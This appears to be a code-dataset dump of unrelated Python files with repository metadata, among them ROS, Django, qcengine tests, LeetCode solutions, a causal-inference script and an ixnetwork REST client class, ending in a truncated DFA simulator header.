def set_DbType(self,DbType):
self.add_query_param('DbType',DbType)
def get_PayType(self):
return self.get_query_params().get('PayType')
def set_PayType(self,PayType):
self.add_query_param('PayType',PayType)
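# Illustrative usage sketch (hypothetical values; the client setup follows the
# usual aliyunsdkcore conventions and is not defined in this file):
#   from aliyunsdkcore.client import AcsClient
#   client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')
#   request = CreateInstanceRequest()
#   request.set_ClusterName('demo-cluster')
#   request.set_PayType('PostPaid')
#   response = client.do_action_with_exception(request)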
|
[
"[email protected]"
] | |
afd5e9a732ae36b23155af1e2cba98c435520645
|
dde6faa0857c8c7e46cbe3c48dbe80b1ac9c9bcf
|
/suspend_resume/scripts/suspend_resume_handler_3.py
|
18f59181cb17badae55a3e34d125fbf2cc356724
|
[] |
no_license
|
ROSDevoloper/Atlas80EVO-Gazebo
|
7119270f4421b1a077e3c4abbb90dcf11281023b
|
468d068584e71c3cca2169b365ec43faaac33f47
|
refs/heads/master
| 2022-10-16T10:02:48.121404 | 2020-06-15T05:08:46 | 2020-06-15T05:08:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,185 |
py
|
#!/usr/bin/env python
"""
Author: (1) Arefeen Ridwan
(2) Samuel Chieng Kien Ho
Function: Suspend Resume based on service request
"""
import rospy
from atlas80evo_msgs.msg import FSMState
from atlas80evo_msgs.srv import SetFSMState
from std_srvs.srv import Empty
from geometry_msgs.msg import Twist
from std_msgs.msg import String
class SuspendResumeHandler():
def __init__(self):
# Internal USE Variables - Modify with consultation
self.rate = rospy.Rate(30)
self.sleep = rospy.Rate(2)
self.pre_state="NONE"
self.current_state="NONE"
# Publisher
self.drive_pub = rospy.Publisher(rospy.get_param("~drive_topic", "/twist_cmd_mux/input/suspend"), Twist, queue_size=1)
# Subscriber
self.state_sub= rospy.Subscriber("/fsm_node/state", FSMState, self.stateCB, queue_size=1) #get current state from ros
# Service Server
self.suspend_srv = rospy.Service("/suspend/request", Empty, self.suspendSRV)
# Service Client
self.set_state_call = rospy.ServiceProxy("/fsm_node/set_state", SetFSMState)
# Main Loop
self.main_loop()
# FSM State Callback
def stateCB(self, msg):
self.current_state = msg.state
if str(msg.state)!="SUSPEND" and str(msg.state)!="ERROR" and str(msg.state)!="MANUAL":
self.pre_state=str(msg.state)
def suspendSRV(self, req):
self.sleep.sleep()
if self.current_state!="SUSPEND":
self.set_state_call("SUSPEND")
self.stopping()
#print("suspend")
else:
self.set_state_call(self.pre_state)
            print(self.pre_state)
self.sleep.sleep()
return ()
# Main Loop
def main_loop(self):
while not rospy.is_shutdown():
if(self.current_state=="SUSPEND"):
self.stopping()
#print("suspend")
self.rate.sleep()
# Stopping Vehicle
def stopping(self):
stop_cmd=Twist()
self.drive_pub.publish(stop_cmd)
if __name__=="__main__":
rospy.init_node("suspend_resume_handler")
SuspendResumeHandler()
rospy.spin()
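# Assumed interaction, based on the service and topic names declared above:
#   rosservice call /suspend/request   # toggles SUSPEND <-> the previous FSM state
# While suspended, main_loop() keeps publishing a zeroed Twist on the suspend
# topic so the vehicle stays stopped.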
|
[
"[email protected]"
] | |
f64feda20504dccac97a40d5747a0a3c49125432
|
d05298a88638fd62f74e8f26c5a1959f821367d1
|
/src/words_baseline/reddit_output_att.py
|
413266f01e93721f50de7639a7e50fc75bac1c43
|
[
"MIT"
] |
permissive
|
rpryzant/causal-text-embeddings
|
d4b93f5852f1854d52a09e28b81ee784015e296a
|
2966493f86a6f808f0dfa71d590e3403a840befc
|
refs/heads/master
| 2022-12-22T09:33:23.654291 | 2020-03-05T19:41:33 | 2020-03-05T19:41:33 | 298,045,006 | 1 | 0 |
MIT
| 2020-09-23T17:28:18 | 2020-09-23T17:28:18 | null |
UTF-8
|
Python
| false | false | 4,087 |
py
|
from semi_parametric_estimation.att import att_estimates, psi_plugin, psi_q_only
from reddit.data_cleaning.reddit_posts import load_reddit_processed
from .helpers import filter_document_embeddings, make_index_mapping, assign_split
import numpy as np
import pandas as pd
import os
from sklearn.linear_model import LogisticRegression, LinearRegression, Ridge
from sklearn.metrics import mean_squared_error as mse
import argparse
import sys
from scipy.special import logit
from scipy.sparse import load_npz
def get_log_outcomes(outcomes):
    # ReLU-style clamp to non-negative, then +1 so the np.log below is well-defined
outcomes = np.array([max(0.0, out) + 1.0 for out in outcomes])
return np.log(outcomes)
def predict_expected_outcomes(model, features):
return model.predict(features)
def fit_conditional_expected_outcomes(outcomes, features):
model = Ridge()
model.fit(features, outcomes)
predict = model.predict(features)
if verbose:
print("Training MSE:", mse(outcomes, predict))
return model
def predict_treatment_probability(labels, features):
model = LogisticRegression(solver='liblinear')
model.fit(features, labels)
if verbose:
print("Training accuracy:", model.score(features, labels))
treatment_probability = model.predict_proba(features)[:,1]
return treatment_probability
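# Note: the probabilities returned above are the propensity scores consumed by
# psi_q_only / psi_plugin in main(), where truncate_level=0.03 clips extreme
# values to stabilize the inverse-probability weighting.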
def load_simulated_data():
sim_df = pd.read_csv(simulation_file, delimiter='\t')
sim_df = sim_df.rename(columns={'index':'post_index'})
return sim_df
def load_term_counts(path='../dat/reddit/'):
return load_npz(path + 'term_counts.npz').toarray()
def main():
if not dat_dir:
term_counts = load_term_counts()
else:
term_counts = load_term_counts(path=dat_dir)
sim_df = load_simulated_data()
treatment_labels = sim_df.treatment.values
indices = sim_df.post_index.values
all_words = term_counts[indices, :]
treated_sim = sim_df[sim_df.treatment==1]
untreated_sim = sim_df[sim_df.treatment==0]
treated_indices = treated_sim.post_index.values
untreated_indices = untreated_sim.post_index.values
all_outcomes = sim_df.outcome.values
outcomes_st_treated = treated_sim.outcome.values
outcomes_st_not_treated = untreated_sim.outcome.values
words_st_treated = term_counts[treated_indices,:]
words_st_not_treated = term_counts[untreated_indices,:]
treatment_probability = predict_treatment_probability(treatment_labels, all_words)
model_outcome_st_treated = fit_conditional_expected_outcomes(outcomes_st_treated, words_st_treated)
model_outcome_st_not_treated = fit_conditional_expected_outcomes(outcomes_st_not_treated, words_st_not_treated)
expected_outcome_st_treated = predict_expected_outcomes(model_outcome_st_treated, all_words)
expected_outcome_st_not_treated = predict_expected_outcomes(model_outcome_st_not_treated, all_words)
q_hat = psi_q_only(expected_outcome_st_not_treated, expected_outcome_st_treated,
treatment_probability, treatment_labels, all_outcomes, truncate_level=0.03, prob_t=treatment_labels.mean())
tmle = psi_plugin(expected_outcome_st_not_treated, expected_outcome_st_treated,
treatment_probability, treatment_labels, all_outcomes, truncate_level=0.03, prob_t=treatment_labels.mean())
print("Q hat:", q_hat)
print("TMLE:", tmle)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--dat-dir", action="store", default=None)
parser.add_argument("--sim-dir", action="store", default='../dat/sim/reddit_subreddit_based/')
parser.add_argument("--subs", action="store", default='13,6,8')
parser.add_argument("--mode", action="store", default="simple")
parser.add_argument("--params", action="store", default="1.0,1.0,1.0")
parser.add_argument("--verbose", action='store_true')
args = parser.parse_args()
sim_dir = args.sim_dir
dat_dir = args.dat_dir
subs = None
if args.subs != '':
subs = [int(s) for s in args.subs.split(',')]
verbose = args.verbose
params = args.params.split(',')
sim_setting = 'beta0' + params[0] + '.beta1' + params[1] + '.gamma' + params[2]
subs_string = ', '.join(args.subs.split(','))
mode = args.mode
simulation_file = sim_dir + 'subreddits['+ subs_string + ']/mode' + mode + '/' + sim_setting + ".tsv"
main()
|
[
"[email protected]"
] | |
bf3628287d6912c3ae78c55e67f21dd80313b222
|
b95e71dcc1b42ebf3459ee57bd0119c618a79796
|
/Array/maximum_subarray.py
|
562be03611c865ee216e753a51da805015ca258d
|
[] |
no_license
|
anton-dovnar/LeetCode
|
e47eece7de28d76b0c3b997d4dacb4f151a839b5
|
6ed9e1bd4a0b48e343e1dd8adaebac26a3bc2ed7
|
refs/heads/master
| 2023-06-29T07:21:06.335041 | 2021-07-31T15:08:05 | 2021-07-31T15:08:05 | 361,205,679 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 268 |
py
|
from typing import List  # needed for the List[int] annotation below
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
max_subarr = float('-inf')
curr_sum = 0
for n in nums:
curr_sum = max(n, curr_sum + n)
max_subarr = max(max_subarr, curr_sum)
return max_subarr
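# Worked example of Kadane's algorithm above (illustrative, not part of the
# original submission):
#   Solution().maxSubArray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) -> 6
#   (the best subarray is [4, -1, 2, 1])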
|
[
"[email protected]"
] | |
96302dbfad171e64160534464df2b0add5495106
|
59e613d6a0bcb8570c89defa77da398f69b82c77
|
/qcengine/tests/test_config.py
|
40178a4cfe0e32b0d39d4a31efe3c27904365901
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
ffangliu/QCEngine
|
3e081e7f5e236c434016e222f716e6b34b24030b
|
835b291986069669e4be0e708ec4846ebfd858d6
|
refs/heads/master
| 2020-04-22T23:57:35.470503 | 2019-02-14T16:57:30 | 2019-02-14T16:57:30 | 170,760,404 | 0 | 0 | null | 2019-02-14T21:27:14 | 2019-02-14T21:27:14 | null |
UTF-8
|
Python
| false | false | 5,049 |
py
|
"""
Tests the DQM compute module configuration
"""
import copy
import os
import pydantic
import pytest
import qcengine
from qcengine.testing import environ_context
def test_node_blank():
node = qcengine.config.NodeDescriptor(name="something", hostname_pattern="*")
def test_node_auto():
desc = {
"name": "something",
"hostname_pattern": "*",
"jobs_per_node": 1,
"ncores": 4,
"memory": 10,
"memory_safety_factor": 0,
}
node1 = qcengine.config.NodeDescriptor(**desc)
job1 = qcengine.get_config(hostname=node1)
assert job1.ncores == 4
assert pytest.approx(job1.memory) == 10.0
desc["jobs_per_node"] = 2
node2 = qcengine.config.NodeDescriptor(**desc)
job2 = qcengine.get_config(hostname=node2)
assert job2.ncores == 2
assert pytest.approx(job2.memory) == 5.0
def test_node_environ():
scratch_name = "myscratch1234"
with environ_context({"QCA_SCRATCH_DIR": scratch_name}):
description = {
"name": "something",
"hostname_pattern": "*",
"scratch_directory": "$QCA_SCRATCH_DIR",
}
node = qcengine.config.NodeDescriptor(**description)
assert node.scratch_directory == scratch_name
def test_node_skip_environ():
description = {
"name": "something",
"hostname_pattern": "*",
"scratch_directory": "$RANDOM_ENVIRON",
}
node = qcengine.config.NodeDescriptor(**description)
assert node.scratch_directory is None
@pytest.fixture
def opt_state_basic():
"""
Capture the options state and temporarily override.
"""
# Snapshot env
old_node = copy.deepcopy(qcengine.config.NODE_DESCRIPTORS)
scratch_name = "myscratch1234"
with environ_context({"QCA_SCRATCH_DIR": scratch_name}):
configs = [{
"name": "dragonstooth",
"hostname_pattern": "dt*",
"jobs_per_node": 2,
"ncores": 12,
"memory": 120,
"scratch_directory": "$NOVAR_RANDOM_ABC123"
}, {
"name": "newriver",
"hostname_pattern": "nr*",
"jobs_per_node": 2,
"ncores": 24,
"memory": 240
},
{
"name": "default",
"hostname_pattern": "*",
"jobs_per_node": 1,
"memory": 4,
"memory_safety_factor": 0,
"ncores": 5,
"scratch_directory": "$QCA_SCRATCH_DIR"
}]
for desc in configs:
node = qcengine.config.NodeDescriptor(**desc)
qcengine.config.NODE_DESCRIPTORS[desc["name"]] = node
yield
# Reset env
qcengine.config.NODE_DESCRIPTORS = old_node
def test_node_matching(opt_state_basic):
node = qcengine.config.get_node_descriptor("nomatching")
assert node.name == "default"
node = qcengine.config.get_node_descriptor("dt149")
assert node.name == "dragonstooth"
node = qcengine.config.get_node_descriptor("nr149")
assert node.name == "newriver"
def test_node_env(opt_state_basic):
node = qcengine.config.get_node_descriptor("dt")
assert node.name == "dragonstooth"
assert node.scratch_directory is None
node = qcengine.config.get_node_descriptor("nomatching")
assert node.name == "default"
assert node.scratch_directory == "myscratch1234"
def test_config_default(opt_state_basic):
config = qcengine.config.get_config(hostname="something")
assert config.ncores == 5
assert config.memory == 4
config = qcengine.config.get_config(hostname="dt149")
assert config.ncores == 6
assert pytest.approx(config.memory, 0.1) == 54
def test_config_local_ncores(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"ncores": 10})
assert config.ncores == 10
assert config.memory == 4
def test_config_local_njobs(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"jobs_per_node": 5})
assert config.ncores == 1
assert pytest.approx(config.memory) == 0.8
def test_config_local_njob_ncore(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"jobs_per_node": 3, "ncores": 1})
assert config.ncores == 1
assert pytest.approx(config.memory, 0.1) == 1.33
def test_config_local_njob_ncore_memory(opt_state_basic):  # renamed: the duplicated name silently shadowed the previous test
config = qcengine.config.get_config(
hostname="something", local_options={
"jobs_per_node": 3,
"ncores": 1,
"memory": 6
})
assert config.ncores == 1
assert pytest.approx(config.memory, 0.1) == 6
def test_config_validation(opt_state_basic):
with pytest.raises(pydantic.ValidationError):
config = qcengine.config.get_config(hostname="something", local_options={"bad": 10})
def test_global_repr():
assert isinstance(qcengine.config.global_repr(), str)
|
[
"[email protected]"
] | |
25bb1e59fa52a1478f01a27db44ee8ae299b07d2
|
81407be1385564308db7193634a2bb050b4f822e
|
/the-python-standard-library-by-example/subprocess/repeater.py
|
cf01ca41051f6970c677e34642d0326924274e24
|
[
"MIT"
] |
permissive
|
gottaegbert/penter
|
6db4f7d82c143af1209b4259ba32145aba7d6bd3
|
8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d
|
refs/heads/master
| 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 |
MIT
| 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null |
UTF-8
|
Python
| false | false | 1,421 |
py
|
#!/usr/bin/env python
#
# Copyright 2007 Doug Hellmann.
#
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Doug
# Hellmann not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# DOUG HELLMANN DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL DOUG HELLMANN BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""Echo anything written to stdin on stdout.
"""
__module_id__ = "$Id$"
#end_pymotw_header
import sys
sys.stderr.write('repeater.py: starting\n')
sys.stderr.flush()
while True:
next_line = sys.stdin.readline()
if not next_line:
break
sys.stdout.write(next_line)
sys.stdout.flush()
sys.stderr.write('repeater.py: exiting\n')
sys.stderr.flush()
|
[
"[email protected]"
] | |
3f78c466709124429eaedfcbc4849133d80eb1be
|
4c4509c34b57350b605af50600eefc0c24a74255
|
/ecommerce/urls.py
|
0dead703ab3eb8c660305689032883b343a6f140
|
[] |
no_license
|
sayanth123/ecomm
|
cd6dd7e8c3fb13048d35c272379a320c20eb3d24
|
67101ebbb08c82bbd15a7c1dfc22c3da5483e307
|
refs/heads/main
| 2023-05-05T03:20:16.660301 | 2021-05-27T04:21:44 | 2021-05-27T04:21:44 | 370,259,601 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,247 |
py
|
"""ecommerce URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from ecommerce import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('ecommerce_app/', include('ecommerceapp.urls')),
path('search_app/', include('search_app.urls')),
path('cart/', include('cart_app.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL,
document_root= settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
#search_app/
#ecommerce_app/
|
[
"[email protected]"
] | |
9170b0b21899081c2505bb3e82a8d26b4391d673
|
d650da884a0a33dd1acf17d04f56d6d22a2287fd
|
/test/test_inspect.py
|
894d8f97bc3c3456e7baeaaca34461ea1c6b61a8
|
[] |
no_license
|
GaelicGrime/rpnpy
|
debe3a79e9a456e13dcd1421d42f01c0bcbe9084
|
5a095dd024403daad93a3222bd190bbb867a8ae2
|
refs/heads/master
| 2023-04-03T11:19:16.737278 | 2020-12-03T08:26:40 | 2020-12-03T08:26:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 962 |
py
|
from unittest import TestCase
from math import log
from rpnpy.inspect import countArgs
class TestCountArgs(TestCase):
"""Test the countArgs function"""
def testZero(self):
"A function that takes zero arguments must be processed correctly"
self.assertEqual(0, countArgs(lambda: 3))
def testOne(self):
"A function that takes one argument must be processed correctly"
self.assertEqual(1, countArgs(lambda x: 3))
def testTwo(self):
"A function that takes two arguments must be processed correctly"
self.assertEqual(2, countArgs(lambda x, y: 3))
def testLog(self):
"The signature of math.log can't be inspected (at least in Python 3.7)"
self.assertEqual(None, countArgs(log))
def testLogWithDefault(self):
"""The signature of math.log can't be inspected (at least in Python
3.7). Pass a default value."""
self.assertEqual(3, countArgs(log, 3))
|
[
"[email protected]"
] | |
d09e8cfd12158d7338f73096900aa2f29faece0c
|
09cead98874a64d55b9e5c84b369d3523c890442
|
/py210110c_python1a/day06_210214/homework/hw_5_yiding.py
|
2b8e12eb578a330374112c74a1059c59eddd995b
|
[] |
no_license
|
edu-athensoft/stem1401python_student
|
f12b404d749286036a090e941c0268381ce558f8
|
baad017d4cef2994855b008a756758d7b5e119ec
|
refs/heads/master
| 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 143 |
py
|
"""
1,1
2,1
3,1
4,0
5,0
6,1
7,0.5
8,1
"""
"""
q1.
none, false, else if, for, in, from, as
q2.
abc$, 0a
q3.
a
q4.
c
q5.
a
q6.
a
q7.
a
q8.
a
"""
|
[
"[email protected]"
] | |
7a6ea156514e8fec2c46d6640f4d2fd9b8b57b5d
|
80b7f2a10506f70477d8720e229d7530da2eff5d
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/statistics/misdirectedperflow/misdirectedperflow.py
|
0562872acb73fb50d2a0e5450f633d42c7da8502
|
[
"MIT"
] |
permissive
|
OpenIxia/ixnetwork_restpy
|
00fdc305901aa7e4b26e4000b133655e2d0e346a
|
c8ecc779421bffbc27c906c1ea51af3756d83398
|
refs/heads/master
| 2023-08-10T02:21:38.207252 | 2023-07-19T14:14:57 | 2023-07-19T14:14:57 | 174,170,555 | 26 | 16 |
MIT
| 2023-02-02T07:02:43 | 2019-03-06T15:27:20 |
Python
|
UTF-8
|
Python
| false | false | 4,342 |
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
if sys.version_info >= (3, 5):
from typing import List, Any, Union
class MisdirectedPerFlow(Base):
"""Display misdirected statistics on a per-flow basis. When active this replaces port level misdirected statistics
The MisdirectedPerFlow class encapsulates a required misdirectedPerFlow resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = "misdirectedPerFlow"
_SDM_ATT_MAP = {
"Enabled": "enabled",
}
_SDM_ENUM_MAP = {}
def __init__(self, parent, list_op=False):
super(MisdirectedPerFlow, self).__init__(parent, list_op)
@property
def Enabled(self):
# type: () -> bool
"""
Returns
-------
- bool: If true then misdirected per flow statistics will be enabled
"""
return self._get_attribute(self._SDM_ATT_MAP["Enabled"])
@Enabled.setter
def Enabled(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["Enabled"], value)
def update(self, Enabled=None):
# type: (bool) -> MisdirectedPerFlow
"""Updates misdirectedPerFlow resource on the server.
Args
----
- Enabled (bool): If true then misdirected per flow statistics will be enabled
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Enabled=None):
# type: (bool) -> MisdirectedPerFlow
"""Finds and retrieves misdirectedPerFlow resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve misdirectedPerFlow resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all misdirectedPerFlow resources from the server.
Args
----
- Enabled (bool): If true then misdirected per flow statistics will be enabled
Returns
-------
- self: This instance with matching misdirectedPerFlow resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of misdirectedPerFlow data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the misdirectedPerFlow resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
|
[
"[email protected]"
] | |
006123581571814076c0c5a650ae638e95c97553
|
6fe2d3c27c4cb498b7ad6d9411cc8fa69f4a38f8
|
/algorithms/algorithms-python/leetcode/Question_010_Regular_Expression_Matching.py
|
68ae34c4b6feaa6b7adadbf0450d28621463d895
|
[] |
no_license
|
Lanceolata/code
|
aae54af632a212c878ce45b11dab919bba55bcb3
|
f7d5a7de27c3cc8a7a4abf63eab9ff9b21d512fb
|
refs/heads/master
| 2022-09-01T04:26:56.190829 | 2021-07-29T05:14:40 | 2021-07-29T05:14:40 | 87,202,214 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 695 |
py
|
#!/usr/bin/python
# coding: utf-8
class Solution(object):
def isMatch(self, s, p):
"""
:type s: str
:type p: str
:rtype: bool
"""
if not p:
return not s
m, n = len(s), len(p)
dp = [[False] * (n + 1) for i in range(m + 1)]
dp[m][n] = True
for i in range(m, -1, -1):
for j in range(n - 1, -1, -1):
match = i < m and (s[i] == p[j] or p[j] == '.')
if j + 1 < n and p[j + 1] == '*':
dp[i][j] = dp[i][j + 2] or (match and dp[i + 1][j])
else:
dp[i][j] = match and dp[i + 1][j + 1]
return dp[0][0]
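# Recurrence sketch (illustrative): dp[i][j] is True iff s[i:] matches p[j:].
# When p[j+1] == '*', the pair "p[j]*" is either skipped entirely (dp[i][j+2])
# or consumes one matching character of s (match and dp[i+1][j]).
# Example: Solution().isMatch("aab", "c*a*b") -> True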
|
[
"[email protected]"
] | |
ee3473b10902f6c6c697639c370c76082fa54da6
|
06919b9fd117fce042375fbd51d7de6bb9ae14fc
|
/py/dcp/problems/graph/find_order.py
|
65b844789e326bb2a11db792095d06afc91af167
|
[
"MIT"
] |
permissive
|
bmoretz/Daily-Coding-Problem
|
0caf2465579e81996869ee3d2c13c9ad5f87aa8f
|
f79e062e9f6e7b18b7e95c071fbe71ad104affcb
|
refs/heads/master
| 2022-12-07T15:41:06.498049 | 2021-11-18T19:45:19 | 2021-11-18T19:45:19 | 226,376,236 | 1 | 0 |
MIT
| 2022-11-22T09:20:23 | 2019-12-06T17:17:00 |
C++
|
UTF-8
|
Python
| false | false | 1,593 |
py
|
'''Topological sort.
We are given a hashmap associating each courseId key with a list of courseIds as values, which tells us that the prerequisites of courseId
are those courseIds. Return a sorted ordering of courses such that we can complete the curriculum.
Return null if there is no such ordering.
For example, given the following prerequisites:
{
'CSC300' : ['CSC100', 'CSC200'],
'CSC200' : ['CSC100'],
'CSC100' : []
}
You should return ['CSC100', 'CSC200', 'CSC300'].
'''
from collections import deque, defaultdict
def find_order1(courses_to_prereqs : dict):
# Copy list values into a set for faster removal
course_to_prereqs = {c : set(p) for c, p in courses_to_prereqs.items()}
# Start off our list with all courses without prerequisites.
todo = deque([c for c, p in course_to_prereqs.items() if not p])
# Create a new data structure to map prereqs to successor courses.
prereq_to_courses = defaultdict(list)
for course, prereqs in course_to_prereqs.items():
for prereq in prereqs:
prereq_to_courses[prereq].append(course)
result = []
while todo:
prereq = todo.popleft()
result.append(prereq)
# Remove this prereq from all successor courses.
# If any course now does not have any prereqs, add it to todo.
for c in prereq_to_courses[prereq]:
course_to_prereqs[c].remove(prereq)
if not course_to_prereqs[c]:
todo.append(c)
# Circular dependency
if len(result) < len(course_to_prereqs):
return None
return result
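# Hypothetical driver mirroring the docstring example:
#   prereqs = {'CSC300': ['CSC100', 'CSC200'], 'CSC200': ['CSC100'], 'CSC100': []}
#   find_order1(prereqs)  ->  ['CSC100', 'CSC200', 'CSC300']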
|
[
"[email protected]"
] | |
b0ee96afdbb8d940aeeedbe2f8276662709cd207
|
09cead98874a64d55b9e5c84b369d3523c890442
|
/py200913b_python2m8/day06_201018/filedir_4_remove.py
|
0740189b7058ab68253a539e1376c26eddba0f08
|
[] |
no_license
|
edu-athensoft/stem1401python_student
|
f12b404d749286036a090e941c0268381ce558f8
|
baad017d4cef2994855b008a756758d7b5e119ec
|
refs/heads/master
| 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 128 |
py
|
"""
remove a file
os.remove(name) deletes a file only; use os.rmdir(name) for an (empty) directory
"""
import os
# os.remove("mydir3a")
# remove a file
os.remove("rename_file_new.py")
|
[
"[email protected]"
] | |
9e673189f7b3663b9f3c1004c0d52e8ed3aec3bb
|
871c8b48a58b3e7dc7821e14bc451acb92dfe33e
|
/cms/migrations/0009_auto_20160308_1456.py
|
e5cf4eb94dfd3f19f01071c28af85f5df2715bea
|
[
"BSD-3-Clause"
] |
permissive
|
sonsandco/djangocms2000
|
6f3937e2185707c32f15e5e42d06e138751d85e4
|
25131e9e8659a7a30a8fd58b7da011cbb928c8ac
|
refs/heads/master
| 2022-08-25T22:18:17.173639 | 2022-08-17T11:36:36 | 2022-08-17T11:36:36 | 121,998,739 | 0 | 0 |
NOASSERTION
| 2022-07-24T05:16:48 | 2018-02-18T23:00:47 |
Python
|
UTF-8
|
Python
| false | false | 1,935 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-08 01:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0008_auto_20150216_1649'),
]
operations = [
migrations.AddField(
model_name='block',
name='language',
field=models.CharField(choices=[('en', 'English'), ('ja', 'Japanese'), ('fr', 'French'), ('es', 'Spanish'), ('pt', 'Portuguese')], default='en-us', max_length=5),
),
migrations.AlterField(
model_name='block',
name='content',
field=models.TextField(blank=True, default=''),
),
migrations.AlterField(
model_name='block',
name='format',
field=models.CharField(choices=[('attr', 'Attribute'), ('plain', 'Plain text'), ('html', 'HTML')], default='plain', max_length=10),
),
migrations.AlterField(
model_name='image',
name='file',
field=models.ImageField(blank=True, upload_to='cms/%y_%m'),
),
migrations.AlterField(
model_name='page',
name='is_live',
field=models.BooleanField(default=True, help_text='If this is not checked, the page will only be visible to logged-in users.'),
),
migrations.AlterField(
model_name='page',
name='template',
field=models.CharField(default='', max_length=255),
),
migrations.AlterField(
model_name='page',
name='url',
field=models.CharField(db_index=True, help_text='e.g. /about/contact', max_length=255, verbose_name='URL'),
),
migrations.AlterUniqueTogether(
name='block',
unique_together=set([('content_type', 'object_id', 'language', 'label')]),
),
]
|
[
"[email protected]"
] | |
7e96884df88998e1cd4b4b6f2f635021055b5322
|
c317f99691f549b393562db200b1e9504ce11f95
|
/algorithms_learn/what_can_be_computed/src/simulateDfa.py
|
efedb724f8a32d4de40d6a61ff15aa0d1e302d68
|
[
"CC-BY-4.0"
] |
permissive
|
RRisto/learning
|
5349f9d3466150dbec0f4b287c13333b02845b11
|
618648f63a09bf946a50e896de8aed0f68b5144a
|
refs/heads/master
| 2023-09-01T00:47:23.664697 | 2023-08-30T17:56:48 | 2023-08-30T17:56:48 | 102,286,332 | 15 | 24 | null | 2023-07-06T21:22:48 | 2017-09-03T18:42:58 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,135 |
py
|
# SISO program simulateDfa.py
